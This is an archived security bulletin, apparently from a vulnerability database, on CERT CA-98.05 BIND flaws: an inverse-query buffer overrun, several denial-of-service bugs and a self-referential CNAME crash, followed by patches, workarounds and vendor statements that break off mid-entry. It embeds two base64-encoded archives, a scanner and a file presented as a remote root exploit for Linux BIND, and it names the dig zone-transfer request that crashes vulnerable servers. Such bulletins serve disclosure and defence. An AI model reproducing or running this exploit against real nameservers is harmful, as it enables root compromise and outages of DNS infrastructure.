COMMAND
BIND
SYSTEMS AFFECTED
Most unices
PROBLEM
Following info is based on CERT Advisory and it covers multiple
vulnerabilities in BIND:
1. Inverse Query Buffer Overrun in BIND 4.9 and BIND 8 Releases
2. Denial-of-Service Vulnerabilities in BIND 4.9 and BIND 8 Releases
3. Denial-of-Service Vulnerability in BIND 8 Releases
Inverse Query Buffer Overrun in BIND 4.9 and BIND 8 Releases
============================================================
BIND 4.9 releases prior to BIND 4.9.7 and BIND 8 releases prior to
8.1.2 do not properly bounds check a memory copy when responding
to an inverse query request. An improperly or maliciously
formatted inverse query on a TCP stream can crash the server or
allow an attacker to gain root privileges. The inverse query
feature is disabled by default, so only the systems that have
been explicitly configured to allow it are vulnerable.
As for BIND 8 look at the "options" block in the configuration
file (typically /etc/named.conf). If there is a "fake-iquery yes;"
line, then the server is vulnerable. As for BIND 4.9 look at the
"options" lines in the configuration file (typically
/etc/named.boot). If there is a line containing "fake-iquery",
then the server is vulnerable. In addition, unlike BIND 8,
inverse query support can be enabled when the server is compiled.
Examine conf/options.h in the source. If the line #defining INVQ
is not commented out, then the server is vulnerable.
Below is a program written to test for vulnerability to the fake
inverse query overflow problem. If the person has a new version
of bind it will still say they are vulnerable. The only true way
to test for vulnerability remotely is to try to crash or exploit
the server. So, in a nutshell, this program will tell you if the
remote host has their fake-iquery option turned on. After that
remote exploit for Linux follows (in 'bind #11' advisory in this
section you can find out more and also a new exploit):
--0-1215649329-892181876=:24208
Content-Type: APPLICATION/octet-stream; name="boft.tar.gz"
Content-Transfer-Encoding: BASE64
Content-ID:
Content-Description:
H4sICGOdLTUCA2JvZnQudGFyAO0Za1PbSJKv6Fd0nM1GMrYsv8heHLhlCUnY
IyQH5Kqu2JRrLI2RDnnG0YzIerP579c9GtmyMb79cKTqbpkqLKm7p6ff3RIj
OW5t3fMKgl7wLAjw2mn3Ort4xdXtFNdibQW7/Xa3297tG3i70+/3tvpb32Dl
SrMMj4wyds3bd9MpnUdc6A1KonoodKHP7tb/yBqh//GvqbnSfnhP/m+jQe70
fzvotbsL/weEb/d6PcQ/+P/eV6vuAAB5X0Eyhps8FTxjo5SDliBveDZO5WcY
ywxGiYjAnWYcfvDbfgda0PP/4v/ggWATHhEXulE8w00wQbNCzG44jNGszeRT
zrMZyKlOpACdZ4JHIAVt+pwlWnMBSqY8ncFoBj9LFecMfvbhJfkE3H8Z3/w4
zVPFMl9w7Tn1luO06pDKkKWgZ1MOiQhT9JACRD22D/BC6SiRfrxfAeUiQegy
DAFpMlqBJVeCpcswnUz46s4sEVfLsJAEIhBKiNJ+ltn1RhlnqkVotcIZwUqG
11wvw5Fjgn+tRCzDWTZlLcKsAVvP3GIUGZ2dG5lE6C0RpXzIUpZNXG/gJEKj
feV1Ph3GUmkCGTqmNQuvhxQOJdkE3TO85rPptS5BiotoOGUkfgm64noFsog2
ghj2zoQlwmXZVdgA/L3xKEaIlkADeghjlkGdcJcfB84XAqET8hDPRGuxKMqG
iYCMIUPaOgbDDR7tQccwA/hSXACm6Ds9dmu5Ylf8OTxR8IJU3f9F1IrTL4OP
3qCkzjgFrn38WjJ/VLXR9xmzG9sfG3B68Pbo/OjsH0dnw/fvzi48e3yVkcrQ
6i6FlXv64eTEK06rmjhjCPvqkL2c6lF0UiwakE29O0xQJxvMDRYXB+aC4hqz
T8Uy07jbmjBjzX2ViOGYTRJMwz04eDU8Pj26GFSRU9qyB7GWQrl48KA0gltS
0Nm+MhckpGg0924sPA/29qDZnvtg24pM2mBhRQk5umzbsIs57sZ4IdxoRtFb
cEAnuqvbPGM4Z9vwNLwnfBJOZ+SMW0KhzXhzP7b3PdRgu+ISaJvnr842TxU3
qJhnmczc2gdRFsWMY6nCwkYCkGQ1rxoSZiOs8Fw8BMaXJtBXnLwhjr+UOaCi
BmCOpVwsHFuk3WW/3cGIS8QoH9v7jIS77PR3Pw4qvJetXbpPRWjvoti41vEN
OH93+Lfh+cXZ0cHbBgS3/Te1pgmZEFJjcccqrsOp5UNm2b6dMmXKHUoheIiV
7IpsWukcNwmDi8P3vm/tOh6nuYrR65HMdQEqKrN7fvz64OQMZatWLptApoi1
+4sIDYvzXDKhu2JnjCGTuCr5jcsxOeNOXRdhYBkaNcNUKo6sN6vsR1JwH2tL
VcbAq7hhOexN4rhF9pKAfhnLFUnnMK9RZmwh/F1pUoSmsjKZGGlA7YmqNYps
FVqyJb6FsJWwRsaC0svuLfKpuC/FoifPKlbEK+pVbRLFZeGdR9V2QS4qCMpo
X1c5zbZKS6FdJvwb8L3dBb//Xh7/Yg8jeD2TShMy++eHlX7DtpCoSq/yTXso
lFw1zvIeSosN+yphUxaFpSasxLz7KWHLwCJq1iQC3gxfvjopkKUot0L2OZTJ
R7MYth4cxXI9j0v+a6LNAbbpVP2Gf2ShRVcpAFa2N0cHL4/OoB4JFVc6z1RT
LygprULzsAiW21IqqSLoFDFdfCF4tgZ7q7nUcBz1u36vZkMO67/ipbBYuuaB
acUnMhzNxkmKsyPmHMqLYcwirD44mCEDUgBPcEuFPFRhUCKa+0m0vT3vgtS/
vSe7/X7XVpuC5lNGNEEFIqehjDhBj//+4ejsnxUUY6vEOlyFZObQdhXCViG5
yBWP7E7UMOMTHOEjM75T72ajJE30DNxEP1XwG88kxlOGms+8BZPpXPKFMfCw
UviqTJ+iUOZCz40RVC3AxDKyXUUKtWlnthZpQ2Znr3Rn4R6LxCBbg0Ej6Dgx
yWg8LWm8NO0GXMzOmPoPtnjuWWXrLjLa2cESCk9/CZ5Wzt3ZGcyDBtPFsMNR
APveuLgvg+f9h4vzNzjuuRfDgwbJVQg4Bx9ilV6Gn7w7fe1izK+j7q0hLXrA
HGxV760YCbt6YQwz6aGC0PVgp7QQZRI99mzO2PmknC5s7q+W5TKlbIHdNJcs
lwYD0pPpJU0mdbwxGWVePc092htvllUvODYsxaJZ0BsjN+IgpoFTvZntqdgv
MCuCEkVF5qWWbjbha2qS8qgytNhAtz18MctZy6x0ng2Gqf/XLEPKU7be0v22
UkT2n3R6fWQNXb/L0vPDSvXqFXvW7zLoHzn7lj0rXfiPN5nlGm2pSuErdYsG
opX2v2Ys3/ozLvr+9xY7PNY1fm/ffzd+/wuC3rPF99+2oUOyoPvw/e8brMND
euUIQ+fw1cnB63N8aL7rOM5jnLlCOZnQqwOD2snxT4iqQYpDl+8TuuyqNFrg
+zDLEoWIx1BQQjMVKsXf4l0Qb4q35pWNP52/hBXQSSLyX+d8HIel6XMYSTnB
n7F2HPolQPnF2tn+zj089AB/jQIeNKUhrdAgkth55pNDMrWcwpQz8RzL0wSa
4zl3OUHQjzyMJdTeI4XiwKOkaPdlnuC7qfP/lP/m6298j///waTe9P+fTveZ
zf+gj4XC5H8Q9B/y/xusx49ao0S0VOyYmG8KqL2RSv8Vao7p48enOI+ZBHQ+
xxj7cAm17wywRkNAjd4Wa9Bky9BPOUE/DnDgpi7rt0xGFhTmHXP1LNOKl4+j
ryV/zp78sB7Ww3pY32L9G/FgKAkAIgAA
--0-1215649329-892181876=:24208--
Remote exploit for Linux:
---
Content-Type: application/octet-stream; name="bind.tgz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="bind.tgz"
Content-MD5: SvZ8Rf2k4gr/6NyqQLqtkw==
H4sIAPciXjUAA+w8e1/bSJLzr/UpCocE2dhGsg0kEOeWAEmYS0IOmMf+gHNkuY2V2JJGDzBJ
Zj/7VVV362EMycxtMne70Qy2uruqurq7ul7dzpUVTdd++LoPdK3N9XX4Aeix5r5VATbW25vd
tt3pdLC8udlp/wDrX5kvftI4cSKAH6IgSO6C+1z7/9Pnitbf891ITIWfOJOv0Ydt3bn+dmdz
ndd/w17fbG+2sabd3uz8ANbXYGb++Tdf/3tLawPPX4vHxlC4EycS0PRgp1h4WizsFgt7hhEJ
Zwg7R89/Noyd3lvhjgNYpuInN02gOWxBcwT2W+PpbW3tt8bubW2dt8bebW3dt4ahlQdDVJd3
WstPW8u7reW9qmEYV2NvIiCJUgHGMADD8EZwCgRWheaFgGq7/agK50YyFj5S2unZxsjTaKcK
bpIgXMciOKJRYRrV5adlEsRDRdHBt6c9S74QvUpO8GmZYIW5gkoFNGe7N8hiY0aXS7uadgWQ
up4Ao1LoZrfcjYZR3elSRXe6d3Mskr56Sv1z7Z7iIecD+y8wsDc3zgp2rRFy+hUitLdqF0kt
Wsm8eRj4IitSDc7GboEA5BAVeNp7umrjxADVYbc7vR0ElQX+4rn4qzff/4GH9f+FN52Kgzdf
q4/P6X+ra7P+X+9sWDYCgm13rPZ3/f8tnlz/v9k5edGrrqVxRDVb8oNKk8B1Jgwly7F8pa+q
IWZhECVAyGgNgjRBy+DDJ5D6QJoH3HCG8fyXTJdjs3P1HlY+hpHnJyOzej+uNpbt2u8rb5We
Xn7+C/SgarX4P62ncesePNvZ3f8MoYeakBv4I+8ClhmpzNNTpYoy1bT76o0m+/QO/gpKTDKK
eMSp54ukqG6LehOfV38/KJGXlmyLLeBds6Hx7ynVOL2GoRg5KepXb+S4ArxYD8/xh4DNXsh1
1GGuPCU2VxbqZl6iSiNPjytToWQNufBXC+j356s+rP+P9nf2Xu1/tT5Q/290u7fr/+5Gpxz/
2dam/d3//yZP0aMqPP1+P3vJ33XjQqQ1/jzDv08KVr2fycZPi7A+UdMZf3/SwPIFzvpE8Ras
T8jUJ43VZ/JlrFYrOAQ4ebFf6qvZbGaQmmdVLNSiNYjEL3AYtFqLel9ZWSl+rsg3WMlrNOQt
k5s9YSRijLpjg8wbOMMpkB0B2pMt7JtrqUAq3YGJ56eztdnDDYhDMQJsQ+M7CbyEjA0AmuPh
mvdbKqJruEwnvmH4AQJNQnAmk+BKDOEdyjpMguA9do0bnimT2aAdkKQhtGSnznsBLoV4zgDt
OZDPjD14/kW8tLREFgKJOKnvjtnKSQYDH66DNIJBMDPc9AMQdy5aWnQHHOTsAiAWbhp5yTUO
OhhMBA2wBVshGF6yEkvWRkEEYpi6TuIFvjOBMI3CIBYQjMBF4nEsCg/GeLvXzq0PNh/jmNFp
AHfszWDsxMhc5EMS4FQJGKXue4oBms3O7FmzieYOJwJXT0wNatKvQXSBC0KvOehfvWX/qU/u
/x/tvN5ruV+jj8/of+hSzofyP512294k/W9vtr/7/9/kgXue707SoYDHcTL0gtb4iVGoS7yp
wKpMn5WgJ96AwA10W9H1jFCVmDXjowFUfreNO+Zdz141sVQDs91BR74uYdZMkrX+q51fV+2W
VasRaCSSNPLNd1T4XXqgcBl46NM6Hu5hswYfqYpIewhiQMy0TGLQfP3Ty5c1RZzIGaxKTA89
c2sbPHgMHfpaXYWaoTWv8rW9VrWhea8x4bzpzC+1IVt5BgX+RdQA7//YdXwMlnzhJl9DA3xm
/7fR2dP73+7aG5T/7W52v+//b/Gs1Q1afVp+XH2gd948ZNk5sl/vgMzyUs04IDMdBVMukcLw
2UlxgyF9TNHaJ/DIui9hHPCmToj2V7jvRUSG/+LCE4bjX185GKmS3WccBkaHBG0zeSxIr1cD
o75mGPcw2kWXCN4cHf64v3uSe05VAsd9KiLtMBH5dziEao6FCmb3xcHLvUqlbeW1u4evXyOt
/snBq/3Dn04qFbvQ+Obw6CRPfq53sCXXeNfxWhzgUBLSenk9ckBu25rnl+udKHTWqKVcHXsX
6NzM1SWodC7KdVNy29x5OKWiy1wpLT1fex2KuFyd+h6SYKUdesM+zpzjJaShoY7bIElj1sVS
v1EtDXfbcMe4Q+ojdCIH6Qi1K+tlpS/6JBt9YgB9RdLSRsWdoNNmEiorTQVOQkAgONQUBc3z
+85wGIEXMo6qJSSq7qPOj53tSgXduMpUTGORmA9ipwFWA2LvgwhGZuyQTqZGN7ymxlasaDbg
gRc2oFvbBiQs61mUezBOAj82aZHJSlAS3GRGsUmurLnzrH/wev+kAceHu//ZPz7B0PhVAw7e
oASeHPZPdt/UatDrQdOuGZUKpVBMi0nJVTWPD57vvDxCjEXTQ/w6EyeamnMySA3Ei0Jilhpg
zk0K1Gs8B4UJUKzQDCrKyA2UFqDAZeV3I4fKLFmediJ7R/La95PAMXFlCEdjV7KlJIusVpoE
wwuPT9vrG+fb2Srma0vjQjFCD3wyjNkaZ0ci5gg96xh7Oc5GhO+1htQqNVjqAZt1g88qTObL
weWTGA9IbhDEggcPsJ9WLHukGjkbcj5lv096mSqoSYlnyjQ3lfjKSzCSMVHnvUcrL3ErroNh
h7XF75VMdLHPbVmVT6kGbtoKOhRRFERmlQhWS/C4ULKoUngZeWJydVWBDlBi3vM7rhb9qemS
YM1meQRGRTpOtNH+lP5n+x+JaZAIdzr8K/x/bLWk/9/udNqW1SX7b69/9/+/ybNW/7JnzVir
Q0FOUCBrbLPnHwk5DND6+4EvbbTjJt6lgERMyFrHIo4xwFeQzV6vDrdac6j3ek0J+aV8fjHo
/OjS2LkQW/kg4fGlh4xPn8DpCLeg70zFOZySLj/PB5rBAGyx7zKGE3RgfuZa+MfSvaW/wVZt
bnYK9LYAFUaW1CdfitoAtdKYS8SHRCo9XgzV1ho2ViEF8tlQFfsXAp0q3ZvqKWMXe6J3yn/E
EyFCGHjJFZpZ3UkBqfSg5oWp50ZoUtA8DeMazD9/YHXKC1VEYx546GLmTEP8hvLykL1CsGUc
bQJPCFzVhEEQpbGICsXQieMr3Z4EKSr4tWQarqF0XfRjdIGccd+L+1NPHnYg0CS4QA2vCqe7
STT5771z3aWh5mWUojzHFIEm8B+wFYYgxY1X/MAfOdMgjWFPepJLS1D0YH/ePzo+OHw958FK
WSMveIpRJgoCxsMQpgO9u6p/zgPWSIfPnh3sHuy87CNsHx0TqL7GGUijFI5xEkS0tHwvB355
+HMhWUrPPHoGevLi4PXz4yJo1cMpjCkNIKXs3v3lpXv3c+LHh6/2GSvHeOWgEL8TMFlxCAP5
SaVvvrRUZdmQoQDJp/ZfEcEPyCGCAQYk99EW4hTf7R1nWYpFTnBeN3L9ZN4nX+xC3xYFUD1Z
5pu1XuAuok0O941AYji4K7ZQDlhdesRgylLc4LSIK/0odOp9dAy4afBBRMEcWNaYSjVgpj75
rmKIC+hfYK1wNcTQoU1J4UEDZAyQ46KqJJ9EVcoXdP/QF9fVQxEn7AfHicKOIyJNTKBAKWNg
pn3qF+vlC4eYbS8sEDck+WcHL/f7u6/2+q93Xu2f2la7e04nr6QDM2Typ0nQdk6wad2iZ1vN
msGJJI51nOjC1SOqY+GSs1aAEjeYOCRSfLhrEhg8hrbMGakhE/ipdc7+cwb0RAPpGSjx2gBG
at9A6kikEtPo4nqql845p7KKk5VNDgPY57VChGWUFsWVYxpJ755iCVQvGBpV2d6SwiL9wecc
ZGLR9WfubsJLqrB1P77dHkLZRpxTIAHuLQSVfi8a2qurq9bYGlstVITwD/K0yLSxNZCLeDt7
ZDo0NyVTirqCbWe9fjcy858jjghRdkq4oJHJgwfpwuOEl/aMMSeyaIuURC2Kaj3f386bCFVQ
+D3GT15tekE5wOCI2gbXPDCTaWrxkSA6PiIRkkEAhVegN73eP/CAutQxFlLCkky5ytB5HrIQ
RlM/zSfjuRLO9UUyLiRtoYSmQjGeJvYEvQ9kOF0604EskcTWXuaIeJmlgaXDKMorCWljg0sh
E1FS3xb8Dbmjc/0Esd7PWhbkAtA+lHUfiF8GQUcA49X188JcYVU+QViQ88NouBSjIBSoOTRl
lJuoKnemCs2WRozI8DW5IB/1zQoKchd00JDUszBci2YV99lj3DwEo9uuIi8hEeBaio+jCfGT
8Sm1k1TmuS7Jmu4cI8DvtFDk9E3p3M/RTrpKRSg/nZS2cUNpU/LmDjkn+mmf53yQjk67uKV4
0mm9ho7MceBIdBVRTEUaUS5Gy+oNumwOQKFnWRv4grTNdgUHyQddOEiFRiMDYpWlF/03b3KN
RBWx7UJbMX9Ehxm1YmNB7BGGsh5qo6pJBFMPd0FKh3ddIxt9ll0qbGupdnJ5s8sypr0BnORC
gozL8jCEH851keD05C7MeGI0u1aDx5Q8MXQCooBWRxBiK3cV+EwHNxGCfzQqMEeReoZVpNlA
u7hN7Uwlq15Iq0OZnCVTCgw6dppKuyZJiEks5CBugNxGsWZU5DyphG6RA2xvb+sGtcNKM9Kp
qebfKW8m4YgHNeJsXpbkrJU6UluO6cythoJYsASLAZWO05AlxyKHUrvfLnbAomNng6BRqA1f
tBd/Mm30/fkXeTj/R2ZtSFHeZfvbn//ZnS7l/NT532Zb/v6j8z3/900emVj5/HWvL7rd9WW3
ub7g9hZ+/BMvcP2xC1vZpSx8542hszTkjtIhGMR864oB6DYWPnw1S9NgIvEWXKGnEQnOWMi8
XoSR8EV6/QHteABj51Iow8MurqSJpgA9Ie89oQ2C4TXRunJ830HX5ZLTe0mAzh7SXsEiu2x0
7Sq48hUF2EbD6IqJGEROIupLsFVjhiIvDHEoDjoahRNcuieGHh/ypQ5nY7psRfA/BvE4deDH
FuxF1Iv5bkjffwvTSexELfQC2QlJxjPiaOxNqSN2qLKcz+vDN2DNHlnG3SmaRemYRWmbReem
Cw4+F5ykupTG+V8ld/7gES9Xk+xg2PbZFA9GCEGYFNI7YwyDJqLPJ3VgqowJXdtLwz4fwJs6
DeMkieO+79PNvwyQZKL/XlyH75OsDuV52A8d6SrP5XDIQ9Q++uiUDmPIS9d1DkX0Q2FTA6db
zmbr4mzWsc9mrnU2G1jV7TnQ9ul6Bvrw0dlstHk2a+O3u6nKHfquGtg8eqSq2mczx0Wq+DdC
6pvds5ltyXfqZXNdknn48GzW3cD3kcSzN3NSSOJhR/ZiIboYyD/NqKPeh21iGmGw7A4Rx8ph
uhaT0tUCe3Mfyd7kXzWbl3gsJhMaLQ9Wp5jAQJ+e280sIabiUncsI6WijyqDH6yUXrmO6/C7
pjIEp1hBU+mOCxXkwJ7Ls1QKsRclf2gzy/6yuLLZ7JWzPr0mJX3IO6zej0FmdihRZdGHTXdB
dbOYbWntRImad6mILoTfoqQ6/RzkV9s+2uCfh8wSEU0lDjSHHiI51xCG4cbGRmvszKyI8jtb
lqLbYC7z3IolUyvFZJ1M1MkMHetWnb1Tsa0cLefCcBE+qkDSK+RXiiFp5GQ5gHqYRHkBdwcJ
/3ZxfTi+lYmMQi3Dv5uqCA/7CkYjir0wnNi0rO0KxZjttmWhnXoCnXXKIa0pyAH59whor3c2
ZBDryQgX/8/yeZSfG1drt2QcjTzBmAlgg/aZGKiEBMdHnF1sYuAEj2FdkkKWSWJmnTbPN4Ux
5WoUqhwR/7oUXnUl0UyoC52+4/wEJUn0RbuuvGiX947l1dU8LeokZa7tdqdbzQc115wpni8c
16PF43r0p8d1B0/tuZG35chZLvMx6+h8ASFeUe88y9Asmh7WN1mK5lYYUc3GEvGQByN+UAKV
bHJzpgZIzkXEsSaQ4KLtlvccpXxyhxmwEu4ynKwsA6axp3aLiNHxsWb3JzMGpirJoNpjyCN/
rcr+8onEDanatoHeUZI0SjNXjXrwNax8WGNIPd91SQGdju3i4qj7nzcpFJaqbko6pIQzxe5x
rqpumqwJ6jXqiyB4pptgb8w18whWUbY0kGyXtY9q6vKLFOWlkjV/EDlKJkgBUGB/vH/08/5R
n+8pFTNBUjLpQirwxVeQ10B4MUq+QORIZUppu1Jf1NXYb0AUKo26QE/WpaLM9OvYV8VMDcZj
SodFodS5kdN8clv+TLeV82dRmOWyTQ0xl0Tj6z70bo79WikpVthYcxn0cq6LrhHOp9GZ1lIv
y8NlyDV92YhzODoz/mABc5QIz5PiXZlxKWRbyrmiMd8Gwi3yk+8MJnz6jnskmFzKu5TEVXGX
ZxosJ1hO1kjrOL/Wty4lraQ2i/GwAegUqowrL610E083yOdrYEfEjiwtPqLI7ZYZDz+bfbUW
r1uop4SunWIwwtn1xA0VtWqmFrXM68nJ1M2uyk3jxsP5VH42nRVceg6c7L5ptdSBz2iSxmM+
75G37yhlS0EE5Pf0is623EfS7bbXMxHNsrg0gwszuJGTp+8i5zPDziVBEc5HzBf3qJ/Pz0GL
fpzZ0qdTimmrYC3L4i+3Un7SExWvS+asZ5W1ht7FcjS3bhgWPM1VpM5H6BeskN0kLBOulSw1
kvV5qylUubfke8YWn+dw5p9mgEUYx1YKdOS3XOJisENLJtu08M9ZLmDHVM9jeQEKZ37Z1isH
Z7FfcExjX262wmIsEDh86e89e1lm44ZMbMFufgBDqn6IcX5SPoy0ch1fmgv8oBxyUYXLKsne
i/2dvf0jqA/9eFxyiHFONZwcUDbV1k3XOEkm2NCxO51NqRX0KYQkUTqIUAzRNK7xae2Ekw/I
AK63Q9de2EsmhpCmqRlkk7utGppPvGHBgLAJrMF92Fhf78itKqF+izS/shyEfDe9Bwf/9dP+
0d/zBscpAyZuuRxRd3ah7JTLqZ/GYihx1NW4SyyT40HGzhl4E/q1m8nX3Pk8wJlQ1v+aF0bS
CCMoPrL/bC6wT8V7ga3fhm6Q+gVbahUGT7/iKDXahUY/vgszWtioJGA1P5KTiyMbybVZ0IKz
kYy9mA7SeZkDDuakAUaFT78kxHWPRE0OteB9rZxZK3m3dCVWywv9EJGIRZSrwt74PVIHeG9+
Ojl+gb4SmCf9nQY7atul6l3UZKX6l4evn6MLlUwWQZvaWSTvs6YOsiSYkfsG0rGz+fBmlJ/K
5jh6inpyomAB2W2jNMfYsz74JAeLQpUOAepaviizmJIkpTwFbeWVcrihEPUWVQqxoMFKLsJC
7ZEfoaPHUMcX3qPYIF9xtAmFx8X5lBQbCiIzq/pYe6jOtdvsmbXh0ycoNM3xSiBFtm9YV4k6
cryJGM67EnIflU7A7H/3EzA+/1E/Bv5afXzm33/ptPW//7VJ/wQA3f+229b33399kyf/91/u
cW7wILtNihUv+VjjV/WL81YLfZvCb7em1+pMg8G3aohATrjVsvHNW5nyyQcq7BANCrs3Sm/L
vBYW6GoQ49LvyhHnIhIi+bDFP9F2UOkPUOENRZxfhv6f9s69p40cCOB/s59iWHGgIlgIoaEX
HjoKC0THowKu3EmRKA0JicgDJeHVwnc/z4yf690QehR0VSyBEq+fs17bO7/xhN8762eiVmIo
+GorGnLR6YiFWEzSmAZtfLEwNvOdoYJkxbh364qZQWRpTInoXrNB6hiTosdHxunEOCWpXV8i
URHl4Y7DUqDeQkcGVrjII+pVNFoVqXXYLW3FUDqCdfhYOt7YmYGPMeysH25uHBzGcFI63oGp
WOwKNw/2j2GrtF862hFZ/oxhL4ZxUU6q6TRRsY3D+EQUsLsL+/FnsV3aLMXpqTkEQby3Xtpd
Dc/OW73W1z/qnb5YlpuokQ0hOFr/ZzVUvTNDoNGjhRrGQ+UdyPMCpN0F9Xx/QcUo4R8oKH06
XV/9EimHU1+CAJVaKytwGh9snUqzbqw6IHvtiFoxW4HQVElILoTJF2kR+cWZrUK4Uu+3mmuw
gsxtrdyeEAIpt2GlLKPL5TJdCUUTuWV/53J3QeWcvwWty/NGF6i5812MVh/JSdBsjZNhXKNH
EpWO59qd+vUVJPtKDyRZdBTml+kbXumKUm7OsDMXYldk8qAspPl6rRHU+lcwgWJmMeomqgah
OwM53Uf9i2/B1/tqgBPgXe3mm3PBMps37ZYNjtSKIarWNxMegNqKwwomaLS9WP+4HPLRMAez
tJUMxZfqXYQ3KBS38K5a4eorV9Ydgu+PUF42AqJhJsZhZFweiGZHtgNMoAg+EQ2u06jPpY3j
0h56szqMj/7CcUzodILjYUGMjfPqzVz7WkwcqU6d8u8ep5xk2t8VFojMDIFstYuzZWR5vWLn
T000JayLfZx4YKO5HWbTqnI5i5OAKfmaqKbar8zxWYhldgFVDlGixeJCoVAoLi0tFZ3nvThX
lMWUQy+/Fq6syNwgda3eEtPwoijVv4b3t8bloQahF4lZ9j50Xn700DJmwapv+Dk/zza54l5K
z1QQwFsvnr9AoP0fDmMceT/n+N+T5//y8vz/+3whny/w+b/R/u91Atv/4ADo4VuZmX9wF6Yt
XlCrwdrmK7F4fYhy0YKYiBej36MP79hIBkuxNLEt9OdDJi61s8vqrHRL1LlifZZ480KFFjnI
wxe2vpjlep1mtXkPX++HMj2RB69oYQc05FBnhHpPHgl6RXsT0ULR2ttO93JgG9/aFsU3O0mx
OkkzOkmxOUkxOVFRYuuRiDGjjcxQNPlPgn8H+/vQP4t8UFZ13AZ1C1LVoZQG+ui7PPmJR1yw
q2vMLq2TPp4unn3UJFneUCjPKYi92BgnNlybLeIMlJckeQM4nkPxMhjeQIiXSvEUxBuK4nkQ
z/L54PKlsQx2NwDdSXJn7K+VT4hh6R0kzKUfgzGmd4DHcfg4/9P8joeEJhsuwxsM8RTDG0Dw
0vRzNsN7n0OFXKONJy34M9M89swA2bg0SfOGg3koa+XpIJvjjfmPDP4xl7OxHCTdZ3hYjqmK
wnLgeMtIx3IWlfOgnN38VB6nnJicZ/fCeNLQYvSZm0ZuacTtecDN8DZN3DKAm8/b7GEpkVs2
cbOAG6TzNhu38SRoT/cpzC1l5qNs1pKAuWj4zsCkUvY+PKjq+WxKaiHWIkL5dWXm1QsVGdab
FU3v3MmkcNw8OKwH5LPGSBoeVHTQZoPg+F9JjnqbDeqmPJMNgvZN4rNBGw36qn2PDGagwRQ2
OAgOele9xSEU28koHylzMIkSfZI4LEj0SaIEiZokjo3pVYy8u/1mMKLmiJhm3ophkoixBiVq
lphM3K8kY7pUac6OOUvGMFOUOX8cKqqqjTAkSky2ScJELYx5WwISJuqLOfuihIkZObupF5Mw
0WaJLkz8YZaYBhOfRRPBgCsXJppoFyYqmujCRJN6MSUprwE6WnZ9MSEkRQNTYaBmgdKW8Wn0
l0X+svYV7tSQif087me6nsL9DPjL5n7DYD97/U4SvzEX9vGCbeM+kkxi5RkgmOkXkwx2Hp9W
r+9+p0jf+ESftmMp6OksSevKVPemLXlOZwl0mLo9eVqr8PCLjDtHy1Sq8Y4JhLf8p2yr31qV
8r8M7P+THUD/rDqe+v2PhXxB8d+C+If8d3GpMNL/vUbwfv/jvxG+T4cH29ul+Gg1lHBEgwob
uWi+Ymv7wZAkF8ho2hRKEFLptK7o153QR6k8txZFoikXlQoYXTYNrtkO/ufG0HXnrKu5zq2k
FJY3bLsEHU2JHJe5JhFHUwrbWZpVjI6WnSE7Tmy8/IUP1Hj2mcQqFhcSoaskCB3AhJK2zNto
i7Es98ToEUs6kg9B8kkbBM4F4k3dLs29yAVmwaITBxYlWZHCVewjXrmIH0e3Tkl8CJMycdIr
zS15pQnf+ukYhVEYhVEYhVH4NcO/OyTRNQB4AAA=
-----
Denial-of-Service Vulnerabilities in BIND 4.9 and BIND 8 Releases
=================================================================
BIND 4.9 releases prior to BIND 4.9.7 and BIND 8 releases prior
to 8.1.2 do not properly bounds check many memory references in
the server and the resolver. An improperly or maliciously
formatted DNS message can cause the server to read from invalid
memory locations, yielding garbage record data or crashing the
server. Many DNS utilities that process DNS messages (e.g., dig,
nslookup) also fail to do proper bounds checking.
Denial-of-Service Vulnerability in BIND 8 Releases
==================================================
Assume that the following self-referential resource record is in
the cache on a name server:
foo.example. IN A CNAME foo.example.
The actual domain name used does not matter; the important thing
is that the target of the CNAME is the same name. The record
could be in the cache either because the server was authoritative
for it or because the server is recursive and someone asked for
it. Once this record is in the cache, issuing a zone transfer
request using its name (e.g., "dig @my_nameserver foo.example.
axfr") will cause the server to abort(). Most sites will not
contain such a record in their configuration files. However, it
is possible for an attacker to engineer such a record into the
cache of a vulnerable nameserver and thus cause a denial of
service. If the BIND 8 server is not recursive and does not fetch
glue, then the problem can be exploited only if the
self-referential resource record is in a zone for which the server
is authoritative. If the global zone transfer ACL in the options
block has been set to deny access and has no self-referential
CNAMEs in its authoritative zones, then the server is not
vulnerable. Otherwise, the server is vulnerable. The nameserver
is recursive by default, fetches glue by default, and the default
global transfer ACL allows all hosts; so many BIND 8 servers will
be vulnerable to this problem.
SOLUTION
BIND 8.1.2-T3B and BIND 4.9.7-T1B are now publicly available and
they address described vulnerabilities. They canbe obtained from:
ftp://ftp.isc.org/isc/bind/src/testing/bind-src.tar.gz
ftp://ftp.isc.org/isc/bind/src/testing/bind-4.9.7-T1B.tar.gz
To address first this problem, you can disable inverse queries,
upgrade to BIND 8.1.2 when it becomes available, or apply the
patch. For BIND 8 disable inverse queries by editing named.conf
so that either there is no "fake-iquery" entry in the "options"
block or the entry is "fake-iquery no;". For BIND 4.9 disable
inverse queries by editing named.boot, removing any "fake-iquery"
entries on "options" lines. Look at conf/options.h in the source.
If INVQ has been defined, comment it out and then rebuild and
reinstall the server. Patches are stored on:
ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-98.05_Topic.1_BIND8_patch.txt
ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-98.05_Topic.1_BIND4.9_patch.txt
There are no workarounds for second problem. You should upgrade
to BIND 8.1.2 or BIND 4.9.7.
To address third problem, you can apply the workaround described
below, upgrade to BIND 8.1.2, or apply the patch. As for
workaround, first set the global zone transfer ACL to deny access
to all hosts by adding the following line to the "options" block:
allow-transfer { none; };
Next, explicitly authorize zone transfers for each authoritative
zone. For example, if the server was authoritative for "example",
adding:
allow-transfer { any; };
to the "zone" statement for "example" would allow anyone to
transfer "example". Patch can be obtained from:
ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-98.05_Topic.3_BIND8.1.1_patch.txt
Vendor informations regarding this vulnerability follows.
Berkeley Software Design, Inc. (BSDI)
-------------------------------------
1. BSD/OS 3.0/3.1 AS SHIPPED is not vulnerable. Sites wishing to
enable fake-iquery can install mod M310-025, available at BSDI
site.
2. BSDI will issue a 3.1 mod when a fix is available.
3. BSD/OS is not vulnerable, since we ship bind 4.9.6
Digital Equipment Corporation
-----------------------------
Digital is investigating this problem.
FreeBSD, Inc.
-------------
We ship with INVQ not defined. This makes us resistent against the
first vulnerability. This is true for all release after 2.2.0
(2.1.* releases are vulnerable but should be upgraded anyway). As
we do not yet ship BIND 8, we are also not vulnerable to the 3rd
vulnerability. We advise everyone to upgrade to BIND 4.9.7.
Hewlett-Packard Company
-----------------------
The problems can be fixed by installing the necessary patch:
